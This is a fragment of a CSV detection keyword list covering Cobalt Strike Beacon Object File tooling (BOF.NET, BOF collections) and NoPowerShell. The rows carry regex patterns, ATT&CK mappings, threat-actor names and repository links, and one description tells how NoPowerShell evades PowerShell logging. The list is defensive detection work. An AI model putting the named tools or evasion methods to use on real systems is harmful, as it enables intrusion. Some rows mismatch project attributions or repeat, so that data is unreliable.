"*bofnet_execute.*",".{0,1000}bofnet_execute\..{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36144"
"*bofnet_execute.cpp*",".{0,1000}bofnet_execute\.cpp.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36145"
"*bofnet_execute.cpp.x64.obj*",".{0,1000}bofnet_execute\.cpp\.x64\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36146"
"*bofnet_execute.cpp.x64.obj*",".{0,1000}bofnet_execute\.cpp\.x64\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36147"
"*bofnet_execute.cpp.x86.obj*",".{0,1000}bofnet_execute\.cpp\.x86\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36148"
"*bofnet_execute.cpp.x86.obj*",".{0,1000}bofnet_execute\.cpp\.x86\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36149"
"*bofnet_init*",".{0,1000}bofnet_init.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36150"
"*bofnet_job *",".{0,1000}bofnet_job\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36151"
"*bofnet_jobkill*",".{0,1000}bofnet_jobkill.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36152"
"*bofnet_jobs*",".{0,1000}bofnet_jobs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36153"
"*bofnet_jobstatus *",".{0,1000}bofnet_jobstatus\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36154"
"*bofnet_list*",".{0,1000}bofnet_list.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36155"
"*bofnet_listassembiles*",".{0,1000}bofnet_listassembiles.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36156"
"*bofnet_load *",".{0,1000}bofnet_load\s.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36157"
"*bofnet_load *.*",".{0,1000}bofnet_load\s.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36158"
"*bofnet_shutdown*",".{0,1000}bofnet_shutdown.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36159"
"*BOFNET_Tests*",".{0,1000}BOFNET_Tests.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36160"
"*bofportscan *",".{0,1000}bofportscan\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","36161"
"*bof-quser *.*",".{0,1000}bof\-quser\s.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","0","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","36162"
